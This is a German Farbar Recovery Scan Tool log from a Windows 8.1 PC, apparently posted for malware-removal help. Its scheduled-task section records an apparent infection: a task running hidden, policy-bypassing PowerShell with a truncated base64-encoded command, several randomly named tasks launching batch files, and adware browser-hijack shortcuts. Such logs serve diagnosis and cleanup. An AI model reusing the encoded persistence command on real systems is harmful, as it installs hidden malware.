2016-03-05 22:21 - 2016-03-05 22:21 - 00020512 _____ C:\WINDOWS\System32\Tasks\{862ADFBD-2F9C-1196-63CC-68B979092056}
2016-03-05 22:21 - 2016-03-05 22:21 - 00003728 _____ C:\WINDOWS\System32\Tasks\{55AB0601-0B56-F46D-28BD-EBA44DF6A920}

==================== Ein Monat: Geänderte Dateien und Ordner ========

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird die Datei/der Ordner verschoben.)

2016-03-29 12:51 - 2012-07-26 09:59 - 00000000 ____D C:\WINDOWS\CbsTemp
2016-03-29 12:50 - 2015-11-01 22:59 - 00003596 _____ C:\WINDOWS\System32\Tasks\Optimize Start Menu Cache Files-S-1-5-21-1569062512-718196537-2772323438-1001
2016-03-29 12:48 - 2015-08-11 08:03 - 00000000 ___SD C:\WINDOWS\SysWOW64\GWX
2016-03-29 12:48 - 2015-08-11 08:03 - 00000000 ___SD C:\WINDOWS\system32\GWX
2016-03-29 12:47 - 2013-10-24 13:02 - 00000000 __RDO C:\Users\Denny\SkyDrive
2016-03-29 00:04 - 2016-02-05 00:38 - 00000884 _____ C:\WINDOWS\Tasks\Adobe Flash Player Updater.job
2016-03-28 23:29 - 2013-08-22 17:36 - 00000000 ____D C:\WINDOWS\AppReadiness
2016-03-28 23:13 - 2013-09-07 18:10 - 00000000 ____D C:\WINDOWS\System32\Tasks\WPD
2016-03-28 23:10 - 2014-07-31 22:27 - 00000000 ____D C:\Users\Administrator
2016-03-28 23:00 - 2013-09-30 06:14 - 01776918 _____ C:\WINDOWS\system32\PerfStringBackup.INI
2016-03-28 23:00 - 2013-09-30 05:56 - 00765582 _____ C:\WINDOWS\system32\perfh007.dat
2016-03-28 23:00 - 2013-09-30 05:56 - 00159366 _____ C:\WINDOWS\system32\perfc007.dat
2016-03-28 23:00 - 2013-08-22 15:36 - 00000000 ____D C:\WINDOWS\Inf
2016-03-28 22:52 - 2013-08-22 16:45 - 00000006 ____H C:\WINDOWS\Tasks\SA.DAT
2016-03-22 03:13 - 2014-12-25 19:50 - 00000000 ____D C:\WINDOWS\system32\appraiser
2016-03-22 03:12 - 2013-09-09 14:33 - 00000000 ____D C:\WINDOWS\system32\MRT
2016-03-22 03:08 - 2013-09-09 14:33 - 143659408 _____ (Microsoft Corporation) C:\WINDOWS\system32\MRT.exe
2016-03-22 00:21 - 2014-05-14 21:48 - 00000000 ____D C:\Program Files (x86)\Mozilla Firefox
2016-03-21 23:32 - 2013-08-22 17:36 - 00000000 ___HD C:\Program Files\WindowsApps
2016-03-21 23:18 - 2015-11-01 23:05 - 00001144 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\zc1h3r7o5m4e.lnk
2016-03-21 23:18 - 2014-03-22 21:23 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome
2016-03-21 23:15 - 2013-08-22 17:36 - 00000000 ____D C:\Program Files\Common Files\System
2016-03-21 22:57 - 2016-01-28 10:48 - 00000000 ____D C:\Users\Denny\AppData\Local\CrashDumps
2016-03-21 22:22 - 2015-06-01 20:54 - 00000000 ____D C:\Program Files (x86)\Color Icons for Gmail
2016-03-21 22:22 - 2014-07-31 22:32 - 00000000 ____D C:\Program Files (x86)\video MediaPlay-Air
2016-03-21 22:22 - 2014-07-31 22:28 - 00000000 ____D C:\Program Files (x86)\HQPureQualV1.8
2016-03-21 18:50 - 2015-10-26 21:57 - 00000000 ____D C:\WINDOWS\Minidump
2016-03-21 18:16 - 2016-01-28 10:50 - 00000000 ____D C:\Users\Denny\AppData\Local\Tempfolder
2016-03-21 18:11 - 2013-08-22 15:25 - 00524288 ___SH C:\WINDOWS\system32\config\BBI
2016-03-21 17:36 - 2013-08-22 16:44 - 00590976 _____ C:\WINDOWS\system32\FNTCACHE.DAT
2016-03-21 17:17 - 2013-08-22 17:36 - 00000000 ____D C:\WINDOWS\system32\FxsTmp
2016-03-21 16:11 - 2016-01-18 20:30 - 00718336 _____ (Microsoft Corporation) C:\WINDOWS\system32\ie4uinit.exe
2016-03-21 16:11 - 2016-01-18 20:30 - 00372224 _____ (Microsoft Corporation) C:\WINDOWS\system32\iedkcs32.dll
2016-03-11 09:50 - 2013-09-15 13:17 - 00000000 ____D C:\Users\Denny\Documents\Rechnungen DS-KFZ
2016-03-09 18:38 - 2013-08-22 17:36 - 00000000 ___RD C:\WINDOWS\ToastData
2016-03-09 09:37 - 2013-09-30 05:59 - 00000000 ____D C:\Program Files\Windows Journal
2016-03-08 12:35 - 2016-02-05 00:36 - 00000000 ____D C:\Users\Denny\AppData\Local\Chromium
2016-03-08 12:08 - 2013-11-10 15:12 - 00267264 ___SH C:\Users\Denny\Desktop\Thumbs.db
2016-03-08 12:04 - 2013-10-24 13:25 - 00000000 ___DC C:\WINDOWS\Panther
2016-03-07 22:12 - 2016-02-19 13:56 - 00001656 _____ C:\Users\Denny\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Explorer.lnk
2016-03-07 21:43 - 2013-08-22 17:36 - 00000000 ____D C:\WINDOWS\system32\NDF

==================== Dateien im Wurzelverzeichnis einiger Verzeichnisse =======

2013-06-29 02:24 - 2013-06-29 02:24 - 0000000 ____H () C:\ProgramData\DP45977C.lfl
2014-03-28 08:18 - 2015-07-29 23:04 - 0000000 ____H () C:\ProgramData\PKP_DLes.DAT
2014-03-28 08:18 - 2015-07-29 23:04 - 0000000 ____H () C:\ProgramData\PKP_DLet.DAT
2014-03-28 08:18 - 2015-07-29 23:04 - 0000000 ____H () C:\ProgramData\PKP_DLev.DAT

Einige Dateien in TEMP:
====================
C:\Users\Administrator.Schneider\AppData\Local\Temp\avgnt.exe
C:\Users\Denny\AppData\Local\Temp\112.tmp.exe
C:\Users\Denny\AppData\Local\Temp\126.tmp.exe
C:\Users\Denny\AppData\Local\Temp\127.tmp.exe
C:\Users\Denny\AppData\Local\Temp\1BFC.tmp.exe
C:\Users\Denny\AppData\Local\Temp\1BFD.tmp.exe
C:\Users\Denny\AppData\Local\Temp\1BFE.tmp.exe
C:\Users\Denny\AppData\Local\Temp\1BFF.tmp.exe
C:\Users\Denny\AppData\Local\Temp\1C15.tmp.exe
C:\Users\Denny\AppData\Local\Temp\2180.tmp.exe
C:\Users\Denny\AppData\Local\Temp\2181.tmp.exe
C:\Users\Denny\AppData\Local\Temp\23EB.tmp.exe
C:\Users\Denny\AppData\Local\Temp\2518.tmp.exe
C:\Users\Denny\AppData\Local\Temp\256E.tmp.exe
C:\Users\Denny\AppData\Local\Temp\26FC.tmp.exe
C:\Users\Denny\AppData\Local\Temp\271A.tmp.exe
C:\Users\Denny\AppData\Local\Temp\271B.tmp.exe
C:\Users\Denny\AppData\Local\Temp\271C.tmp.exe
C:\Users\Denny\AppData\Local\Temp\2737.tmp.exe
C:\Users\Denny\AppData\Local\Temp\2764.tmp.exe
C:\Users\Denny\AppData\Local\Temp\2765.tmp.exe
C:\Users\Denny\AppData\Local\Temp\2766.tmp.exe
C:\Users\Denny\AppData\Local\Temp\277A.tmp.exe
C:\Users\Denny\AppData\Local\Temp\277B.tmp.exe
C:\Users\Denny\AppData\Local\Temp\2790.tmp.exe
C:\Users\Denny\AppData\Local\Temp\2791.tmp.exe
C:\Users\Denny\AppData\Local\Temp\27A6.tmp.exe
C:\Users\Denny\AppData\Local\Temp\27A7.tmp.exe
C:\Users\Denny\AppData\Local\Temp\27B0.tmp.exe
C:\Users\Denny\AppData\Local\Temp\27BE.tmp.exe
C:\Users\Denny\AppData\Local\Temp\27D5.tmp.exe
C:\Users\Denny\AppData\Local\Temp\27DA.tmp.exe
C:\Users\Denny\AppData\Local\Temp\27DB.tmp.exe
C:\Users\Denny\AppData\Local\Temp\2824.tmp.exe
C:\Users\Denny\AppData\Local\Temp\2825.tmp.exe
C:\Users\Denny\AppData\Local\Temp\283A.tmp.exe
C:\Users\Denny\AppData\Local\Temp\283B.tmp.exe
C:\Users\Denny\AppData\Local\Temp\2918.tmp.exe
C:\Users\Denny\AppData\Local\Temp\2919.tmp.exe
C:\Users\Denny\AppData\Local\Temp\291A.tmp.exe
C:\Users\Denny\AppData\Local\Temp\2930.tmp.exe
C:\Users\Denny\AppData\Local\Temp\295C.tmp.exe
C:\Users\Denny\AppData\Local\Temp\29AF.tmp.exe
C:\Users\Denny\AppData\Local\Temp\2A0C.tmp.exe
C:\Users\Denny\AppData\Local\Temp\2A81.tmp.exe
C:\Users\Denny\AppData\Local\Temp\2A82.tmp.exe
C:\Users\Denny\AppData\Local\Temp\336E.tmp.exe
C:\Users\Denny\AppData\Local\Temp\3399.tmp.exe
C:\Users\Denny\AppData\Local\Temp\339A.tmp.exe
C:\Users\Denny\AppData\Local\Temp\3404.tmp.exe
C:\Users\Denny\AppData\Local\Temp\342E.tmp.exe
C:\Users\Denny\AppData\Local\Temp\3447.tmp.exe
C:\Users\Denny\AppData\Local\Temp\3448.tmp.exe
C:\Users\Denny\AppData\Local\Temp\3449.tmp.exe
C:\Users\Denny\AppData\Local\Temp\356F.tmp.exe
C:\Users\Denny\AppData\Local\Temp\35B9.tmp.exe
C:\Users\Denny\AppData\Local\Temp\35CB.tmp.exe
C:\Users\Denny\AppData\Local\Temp\35CC.tmp.exe
C:\Users\Denny\AppData\Local\Temp\35CD.tmp.exe
C:\Users\Denny\AppData\Local\Temp\35CE.tmp.exe
C:\Users\Denny\AppData\Local\Temp\35CF.tmp.exe
C:\Users\Denny\AppData\Local\Temp\35D0.tmp.exe
C:\Users\Denny\AppData\Local\Temp\35D1.tmp.exe
C:\Users\Denny\AppData\Local\Temp\35D2.tmp.exe
C:\Users\Denny\AppData\Local\Temp\35D3.tmp.exe
C:\Users\Denny\AppData\Local\Temp\35D4.tmp.exe
C:\Users\Denny\AppData\Local\Temp\35E2.tmp.exe
C:\Users\Denny\AppData\Local\Temp\35E3.tmp.exe
C:\Users\Denny\AppData\Local\Temp\35E4.tmp.exe
C:\Users\Denny\AppData\Local\Temp\35E5.tmp.exe
C:\Users\Denny\AppData\Local\Temp\35E6.tmp.exe
C:\Users\Denny\AppData\Local\Temp\35E7.tmp.exe
C:\Users\Denny\AppData\Local\Temp\35E8.tmp.exe
C:\Users\Denny\AppData\Local\Temp\35F8.tmp.exe
C:\Users\Denny\AppData\Local\Temp\35FD.tmp.exe
C:\Users\Denny\AppData\Local\Temp\35FE.tmp.exe
C:\Users\Denny\AppData\Local\Temp\35FF.tmp.exe
C:\Users\Denny\AppData\Local\Temp\3612.tmp.exe
C:\Users\Denny\AppData\Local\Temp\3613.tmp.exe
C:\Users\Denny\AppData\Local\Temp\3619.tmp.exe
C:\Users\Denny\AppData\Local\Temp\3628.tmp.exe
C:\Users\Denny\AppData\Local\Temp\3629.tmp.exe
C:\Users\Denny\AppData\Local\Temp\362C.tmp.exe
C:\Users\Denny\AppData\Local\Temp\3640.tmp.exe
C:\Users\Denny\AppData\Local\Temp\3641.tmp.exe
C:\Users\Denny\AppData\Local\Temp\3655.tmp.exe
C:\Users\Denny\AppData\Local\Temp\3656.tmp.exe
C:\Users\Denny\AppData\Local\Temp\366D.tmp.exe
C:\Users\Denny\AppData\Local\Temp\366E.tmp.exe
C:\Users\Denny\AppData\Local\Temp\366F.tmp.exe
C:\Users\Denny\AppData\Local\Temp\3670.tmp.exe
C:\Users\Denny\AppData\Local\Temp\3671.tmp.exe
C:\Users\Denny\AppData\Local\Temp\3681.tmp.exe
C:\Users\Denny\AppData\Local\Temp\3682.tmp.exe
C:\Users\Denny\AppData\Local\Temp\3683.tmp.exe
C:\Users\Denny\AppData\Local\Temp\3684.tmp.exe
C:\Users\Denny\AppData\Local\Temp\3685.tmp.exe
C:\Users\Denny\AppData\Local\Temp\3686.tmp.exe
C:\Users\Denny\AppData\Local\Temp\36AD.tmp.exe
C:\Users\Denny\AppData\Local\Temp\36DE.tmp.exe
C:\Users\Denny\AppData\Local\Temp\36F4.tmp.exe
C:\Users\Denny\AppData\Local\Temp\3782.tmp.exe
C:\Users\Denny\AppData\Local\Temp\3783.tmp.exe
C:\Users\Denny\AppData\Local\Temp\37BA.tmp.exe
C:\Users\Denny\AppData\Local\Temp\37BB.tmp.exe
C:\Users\Denny\AppData\Local\Temp\37BC.tmp.exe
C:\Users\Denny\AppData\Local\Temp\380C.tmp.exe
C:\Users\Denny\AppData\Local\Temp\380D.tmp.exe
C:\Users\Denny\AppData\Local\Temp\3822.tmp.exe
C:\Users\Denny\AppData\Local\Temp\3908.tmp.exe
C:\Users\Denny\AppData\Local\Temp\3963.tmp.exe
C:\Users\Denny\AppData\Local\Temp\3A50.tmp.exe
C:\Users\Denny\AppData\Local\Temp\3F35.tmp.exe
C:\Users\Denny\AppData\Local\Temp\4038.tmp.exe
C:\Users\Denny\AppData\Local\Temp\4040.tmp.exe
C:\Users\Denny\AppData\Local\Temp\4056.tmp.exe
C:\Users\Denny\AppData\Local\Temp\4080.tmp.exe
C:\Users\Denny\AppData\Local\Temp\4081.tmp.exe
C:\Users\Denny\AppData\Local\Temp\44E0.tmp.exe
C:\Users\Denny\AppData\Local\Temp\4523.tmp.exe
C:\Users\Denny\AppData\Local\Temp\4524.tmp.exe
C:\Users\Denny\AppData\Local\Temp\4525.tmp.exe
C:\Users\Denny\AppData\Local\Temp\55DF.tmp.exe
C:\Users\Denny\AppData\Local\Temp\55F4.tmp.exe
C:\Users\Denny\AppData\Local\Temp\55F5.tmp.exe
C:\Users\Denny\AppData\Local\Temp\55F6.tmp.exe
C:\Users\Denny\AppData\Local\Temp\55F7.tmp.exe
C:\Users\Denny\AppData\Local\Temp\560B.tmp.exe
C:\Users\Denny\AppData\Local\Temp\560C.tmp.exe
C:\Users\Denny\AppData\Local\Temp\5620.tmp.exe
C:\Users\Denny\AppData\Local\Temp\5621.tmp.exe
C:\Users\Denny\AppData\Local\Temp\9F4F.tmp.exe
C:\Users\Denny\AppData\Local\Temp\9F64.tmp.exe
C:\Users\Denny\AppData\Local\Temp\9F8D.tmp.exe
C:\Users\Denny\AppData\Local\Temp\9F8E.tmp.exe
C:\Users\Denny\AppData\Local\Temp\A170.tmp.exe
C:\Users\Denny\AppData\Local\Temp\avgnt.exe
C:\Users\Denny\AppData\Local\Temp\F64A.tmp.exe
C:\Users\Denny\AppData\Local\Temp\F6BE.tmp.exe
C:\Users\Denny\AppData\Local\Temp\F707.tmp.exe
C:\Users\Denny\AppData\Local\Temp\F708.tmp.exe
C:\Users\Denny\AppData\Local\Temp\F79B.tmp.exe
C:\Users\Denny\AppData\Local\Temp\F844.tmp.exe
C:\Users\Denny\AppData\Local\Temp\sqlite3.dll

==================== Bamital & volsnap =================

(Es ist kein automatischer Fix für Dateien vorhanden, die an der Verifikation gescheitert sind.)

C:\WINDOWS\system32\winlogon.exe => Datei ist digital signiert
C:\WINDOWS\system32\wininit.exe => Datei ist digital signiert
C:\WINDOWS\explorer.exe => Datei ist digital signiert
C:\WINDOWS\SysWOW64\explorer.exe => Datei ist digital signiert
C:\WINDOWS\system32\svchost.exe => Datei ist digital signiert
C:\WINDOWS\SysWOW64\svchost.exe => Datei ist digital signiert
C:\WINDOWS\system32\services.exe => Datei ist digital signiert
C:\WINDOWS\system32\User32.dll => Datei ist digital signiert
C:\WINDOWS\SysWOW64\User32.dll => Datei ist digital signiert
C:\WINDOWS\system32\userinit.exe => Datei ist digital signiert
C:\WINDOWS\SysWOW64\userinit.exe => Datei ist digital signiert
C:\WINDOWS\system32\rpcss.dll => Datei ist digital signiert
C:\WINDOWS\system32\dnsapi.dll => Datei ist digital signiert
C:\WINDOWS\SysWOW64\dnsapi.dll => Datei ist digital signiert
C:\WINDOWS\system32\Drivers\volsnap.sys => Datei ist digital signiert

LastRegBack: 2016-03-09 10:08

==================== Ende von FRST.txt ============================

Code:
Zusätzliches Untersuchungsergebnis von Farbar Recovery Scan Tool (x64) Version:05-03-2016 01
durchgeführt von Denny (2016-03-29 13:02:36)
Gestartet von C:\Users\Denny\Desktop
Windows 8.1 (X64) (2013-10-24 10:59:13)
Start-Modus: Normal
==========================================================

==================== Konten: =============================

Administrator (S-1-5-21-1569062512-718196537-2772323438-500 - Administrator - Enabled) => C:\Users\Administrator.Schneider
Denny (S-1-5-21-1569062512-718196537-2772323438-1001 - Administrator - Enabled) => C:\Users\Denny
Gast (S-1-5-21-1569062512-718196537-2772323438-501 - Limited - Disabled)
HomeGroupUser$ (S-1-5-21-1569062512-718196537-2772323438-1005 - Limited - Enabled)

==================== Sicherheits-Center ========================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er entfernt.)

AV: Avira Antivirus (Enabled - Up to date) {4D041356-F94D-285F-8768-AAE50FA36859}
AV: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AS: Avira Antivirus (Enabled - Up to date) {F665F2B2-DF77-27D1-BDD8-9197742422E4}
AS: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}

==================== Installierte Programme ======================

(Nur Adware-Programme mit dem Zusatz "Hidden" können in die Fixlist aufgenommen werden, um sie sichtbar zu machen. Die Adware-Programme sollten manuell deinstalliert werden.)

Acer Docs (HKLM-x32\...\{CA4FE8B0-298C-4E5D-A486-F33B126D6A0A}) (Version: 1.03.3000 - Acer Incorporated)
Acer Docs Office AddIn (HKLM-x32\...\{DCBF3379-246B-47E1-8173-639B63940838}) (Version: 2.04.2005 - Acer)
Acer Launch Manager (HKLM\...\{C18D55BD-1EC6-466D-B763-8EEDDDA9100E}) (Version: 8.00.3003 - Acer Incorporated)
Acer Media (HKLM-x32\...\{E9AF1707-3F3A-49E2-8345-4F2D629D0876}) (Version: 2.04.3002.6 - Acer Incorporated)
Acer Photo (HKLM-x32\...\{B5AD89F2-03D3-4206-8487-018298007DD0}) (Version: 2.04.3003.1 - Acer Incorporated)
Acer Portal (HKLM-x32\...\{A5AD0B17-F34D-49BE-A157-C8B3D52ACD13}) (Version: 2.04.3004 - Acer Incorporated)
Acer Power Management (HKLM\...\{91F52DE4-B789-42B0-9311-A349F10E5479}) (Version: 7.00.3012 - Acer Incorporated)
Acer Recovery Management (HKLM\...\{07F2005A-8CAC-4A4B-83A2-DA98A722CA61}) (Version: 6.00.3016 - Acer Incorporated)
Acer Remote Files (HKLM\...\{13885028-098C-4799-9B71-27DAC96502D5}) (Version: 1.02.3001 - Acer Incorporated)
Acer USB Charge Manager (HKLM\...\{07E867C5-0C48-40FF-A013-DDAF4565AD47}) (Version: 2.00.3004 - Acer Incorporated)
Adobe AIR (HKLM-x32\...\Adobe AIR) (Version: 4.0.0.1390 - Adobe Systems Incorporated)
Adobe Creative Cloud (HKLM-x32\...\Adobe Creative Cloud) (Version: 2.7.0.413 - Adobe Systems Incorporated)
Adobe Download Assistant (HKLM-x32\...\com.adobe.downloadassistant.AdobeDownloadAssistant) (Version: 1.2.6 - Adobe Systems Incorporated)
Adobe Flash Player 18 PPAPI (HKLM-x32\...\Adobe Flash Player PPAPI) (Version: 18.0.0.209 - Adobe Systems Incorporated)
Adobe Photoshop Elements 13 (HKLM-x32\...\{609818B9-23EB-4196-B466-EFE05E92A32F}) (Version: 13.0 - Adobe Systems Incorporated)
Amazon 1Button App (x32 Version: 1.0.6 - Amazon) Hidden
Avira Antivirus (HKLM-x32\...\Avira Antivirus) (Version: 15.0.16.282 - Avira Operations GmbH & Co. KG)
clear.fi SDK - Video 2 (x32 Version: 2.2.2722 - CyberLink Corp.) Hidden
clear.fi SDK- Movie 2 (x32 Version: 2.2.2729 - CyberLink Corp.) Hidden
CyberLink MediaEspresso 6.5 (HKLM-x32\...\InstallShield_{E3739848-5329-48E3-8D28-5BBD6E8BE384}) (Version: 6.5.3729_45993 - CyberLink Corp.)
Dolby Home Theater v4 (HKLM-x32\...\{B26438B4-BF51-49C3-9567-7F14A5E40CB9}) (Version: 7.2.8000.17 - Dolby Laboratories Inc)
Epson Customer Research Participation (HKLM\...\{B26449A6-6007-4460-B4FE-C4776115BCEA}) (Version: 1.61.0000 - EPSON)
EPSON Scan (HKLM-x32\...\EPSON Scanner) (Version: - Seiko Epson Corporation)
EPSON XP-700 Series Printer Uninstall (HKLM\...\EPSON XP-700 Series) (Version: - SEIKO EPSON Corporation)
Google Chrome (HKLM-x32\...\Google Chrome) (Version: 35.0.1916.153 - Google Inc.)
HID Monitor (HKLM-x32\...\{31923C55-8208-4D0A-8AD6-3AE099A1A741}) (Version: 1.1.5 - Acer Incorporated)
Identity Card (HKLM-x32\...\{3D9CB654-99AD-4301-89C6-0D12A790767C}) (Version: 2.00.3006 - Acer Incorporated)
Intel(R) Management Engine Components (HKLM-x32\...\{65153EA5-8B6E-43B6-857B-C6E4FC25798A}) (Version: 8.1.0.1281 - Intel Corporation)
Intel(R) Processor Graphics (HKLM-x32\...\{F0E3AD40-2BBD-4360-9C76-B9AC9A5886EA}) (Version: 10.18.10.3958 - Intel Corporation)
Intel(R) SDK for OpenCL - CPU Only Runtime Package (HKLM-x32\...\{FCB3772C-B7D0-4933-B1A9-3707EBACC573}) (Version: 2.0.0.37149 - Intel Corporation)
Java 8 Update 25 (HKLM-x32\...\{26A24AE4-039D-4CA4-87B4-2F83218025F0}) (Version: 8.0.250 - Oracle Corporation)
Live Updater (HKLM-x32\...\{EE26E302-876A-48D9-9058-3129E5B99999}) (Version: 2.00.3010 - Acer Incorporated)
Microsoft Office Professional Plus 2010 (HKLM-x32\...\Office14.PROPLUS) (Version: 14.0.4763.1000 - Microsoft Corporation)
Microsoft Silverlight (HKLM-x32\...\{89F4137D-6C26-4A84-BDB8-2E5A4BB71E00}) (Version: 5.1.30514.0 - Microsoft Corporation)
Microsoft SkyDrive (HKU\S-1-5-21-1569062512-718196537-2772323438-1001\...\SkyDriveSetup.exe) (Version: 16.4.6013.0910 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.17 (HKLM\...\{8220EEFE-38CD-377E-8595-13398D740ACE}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM-x32\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148 (HKLM-x32\...\{1F1C2DFC-2D24-3E06-BCB8-725134ADF989}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Mozilla Firefox 45.0.1 (x86 de) (HKLM-x32\...\Mozilla Firefox 45.0.1 (x86 de)) (Version: 45.0.1 - Mozilla)
Mozilla Maintenance Service (HKLM-x32\...\MozillaMaintenanceService) (Version: 45.0.1 - Mozilla)
Nero BackItUp 12 Essentials OEM.a01 (HKLM-x32\...\{4CA8F973-6377-4ABF-9ED5-CC2323B3C000}) (Version: 12.5.00500 - Nero AG)
Nero MediaHome Free (HKLM-x32\...\{6CC8CA12-AD2B-4C07-B2C4-B32CDBF5F29D}) (Version: 15.0.01800 - Nero AG)
Nikon Message Center 2 (HKLM-x32\...\{B014EE44-9197-4513-9613-71E6EB1B514E}) (Version: 2.0.1 - Nikon)
Picture Control Utility (HKLM-x32\...\{87441A59-5E64-4096-A170-14EFE67200C3}) (Version: 1.2.2 - Nikon)
Prerequisite installer (x32 Version: 12.0.0003 - Nero AG) Hidden
Prerequisite installer (x32 Version: 15.0.0005 - Nero AG) Hidden
Qualcomm Atheros Bluetooth Suite (64) (HKLM\...\{A84A4FB1-D703-48DB-89E0-68B6499D2801}) (Version: 8.0.0.222 - Qualcomm Atheros Communications)
Realtek Ethernet Controller Driver (HKLM-x32\...\{8833FFB6-5B0C-4764-81AA-06DFEED9A476}) (Version: 8.14.327.2013 - Realtek)
Realtek High Definition Audio Driver (HKLM-x32\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.1.6870 - Realtek Semiconductor Corp.)
Realtek PCIE Card Reader (HKLM-x32\...\{C9661090-C134-46E8-90B2-76D72355C2A6}) (Version: 6.2.9200.21222 - Realtek Semiconductor Corp.)
Samsung Link 1.8.0.1403131552 (HKLM\...\8474-7877-9059-0204) (Version: 1.8.0.1403131552 - Copyright 2013 SAMSUNG)
SAMSUNG USB Driver for Mobile Phones (HKLM\...\{D0795B21-0CDA-4a92-AB9E-6E92D8111E44}) (Version: 1.5.33.0 - SAMSUNG Electronics Co., Ltd.)
Shared C Run-time for x64 (HKLM\...\{EF79C448-6946-4D71-8134-03407888C054}) (Version: 10.0.0 - McAfee)
Software Updater (HKLM-x32\...\{B307472F-7BD9-4040-9255-CE6D6A1196A3}) (Version: 4.3.1 - SEIKO EPSON CORPORATION)
SonyEditor (remove only) (HKLM-x32\...\SonyEditor) (Version: - )
Visual Studio 2005 Tools for Office Second Edition Runtime (HKLM-x32\...\Microsoft Visual Studio 2005 Tools for Office Runtime) (Version: - Microsoft Corporation)
Visual Studio Tools for the Office system 3.0 Runtime (HKLM-x32\...\Visual Studio Tools for the Office system 3.0 Runtime) (Version: - Microsoft Corporation)
Visual Studio Tools for the Office system 3.0 Runtime Service Pack 1 (KB949258) (HKLM-x32\...\{8FB53850-246A-3507-8ADE-0060093FFEA6}.KB949258) (Version: 1 - Microsoft Corporation)

==================== Benutzerdefinierte CLSID (Nicht auf der Ausnahmeliste): ==========================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)

CustomCLSID: HKU\S-1-5-21-1569062512-718196537-2772323438-1001_Classes\CLSID\{820D63D5-8CFF-46DE-86AF-4997DEDD6DB5}\localserver32 -> C:\WINDOWS\system32\igfxEM.exe (Intel Corporation)

==================== Geplante Aufgaben (Nicht auf der Ausnahmeliste) =============

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)

Task: {1297570B-38F1-49A5-A941-B11ED2E003D4} - System32\Tasks\Adobe Flash Player Updater => C:\WINDOWS\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe [2016-02-05] (Adobe Systems Incorporated) Task: {13B8CF77-9E85-407D-A789-112A0DDF8A7F} - System32\Tasks\Foxvohji => C:\PROGRA~1\SHOPPE~3\Madre.bat Task: {221D435A-EA55-420E-8423-8ED93C16F2BD} - System32\Tasks\{862ADFBD-2F9C-1196-63CC-68B979092056} => powershell.exe -windowstyle hidden -noninteractive -ExecutionPolicy bypass -EncodedCommand IAAgADsAOwAgACAAIAA7ACAAIAA7ACAAIAA7ADsAOwAgADsAIAAgACAAOwAgACAAOwA7ADsAOwA7ACQARQByAHIAbwByAEEAYwB0AGkAbwBuAFAAcgBlAGYAZQByAGUAbgBjAGUAPQAiAHMAdABvAHAAIgA7ACQAcwBjAD0AIgBTAGkAbABlAG4AdABsAHkAQwBvAG4AdABpAG4AdQBlACIAOwAkAFcA (Der Dateneintrag hat 8096 mehr Zeichen). Task: {45E15A8F-D60A-4899-94EE-F2D2FFC44C1D} - System32\Tasks\{55AB0601-0B56-F46D-28BD-EBA44DF6A920} => C:\WINDOWS\system32\regsvr32.exe [2014-10-29] (Microsoft Corporation) Task: {582339AA-55CB-446D-9C0A-E237D27C9460} - System32\Tasks\DeviceDetector => C:\Program Files (x86)\CyberLink\MediaEspresso\DeviceDetector\DeviceDetector.exe [2013-02-08] (CyberLink) Task: {6631CA39-E6CA-443E-A7B3-C72F37978029} - System32\Tasks\{12146BCF-AB85-4EF1-B4A9-E5E62ADD7B59} => pcalua.exe -a "C:\Program Files (x86)\GUPlayer\Uninstaller.exe" -d "C:\Program Files (x86)\GUPlayer" Task: {691F8DB4-04E1-4275-8E3C-4A02A8A0BF55} - System32\Tasks\Microsoft\Windows\RemovalTools\MRT_HB => C:\WINDOWS\system32\MRT.exe [2016-03-22] (Microsoft Corporation) Task: {6D2FBF57-89ED-48A5-B2E0-752E571395C4} - System32\Tasks\{07238A32-598B-4B2D-8035-1479B16A3DB0} => pcalua.exe -a C:\Users\Denny\AppData\Roaming\yoursearching\UninstallManager.exe -c -ptid=face Task: {767E686C-0DA9-4ED3-9F7E-C07DBE050AF0} - System32\Tasks\Siaby => C:\PROGRA~1\SHOPPE~1\Imuarb.bat Task: {9DD2C156-62AC-406B-9385-CADD795FD545} - System32\Tasks\Conbyg => C:\PROGRA~1\SHOPPE~1\Jyjdhb.bat Task: {9FCAB4F1-032C-4A7C-964D-D7642FE7C9C7} - System32\Tasks\Fimgumbo => 
C:\PROGRA~1\GROOVE~1\Itiulgac.bat Task: {A641688E-E37E-40B4-9239-4268905DD07C} - System32\Tasks\Vuaga => C:\PROGRA~1\SHOPPE~1\Atoqbiuz.bat Task: {BE213BAE-DF95-400C-ADD4-F489EA0AEC83} - System32\Tasks\Sitnis => C:\PROGRA~1\SHOPPE~2\Qapwifa.bat (Wenn ein Eintrag in die Fixlist aufgenommen wird, wird die Aufgabe verschoben. Die Datei, die durch die Aufgabe gestartet wird, wird nicht verschoben.) Task: C:\WINDOWS\Tasks\Adobe Flash Player Updater.job => C:\WINDOWS\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe ==================== Verknüpfungen ============================= (Die Einträge können gelistet werden, um sie zurückzusetzen oder zu entfernen.) ShortcutWithArgument: C:\Users\Denny\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Explorer.lnk -> C:\Program Files\Internet Explorer\iexplore.exe (Microsoft Corporation) -> hxxp://www%2dmysearch.com/?prd=set_epc&s=G37zftptn095001,36925718-a198-4f72-92af-e9bcc635037f, ShortcutWithArgument: C:\Users\Denny\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Launch Internet-Explorer Browser.lnk -> C:\Program Files\Internet Explorer\iexplore.exe (Microsoft 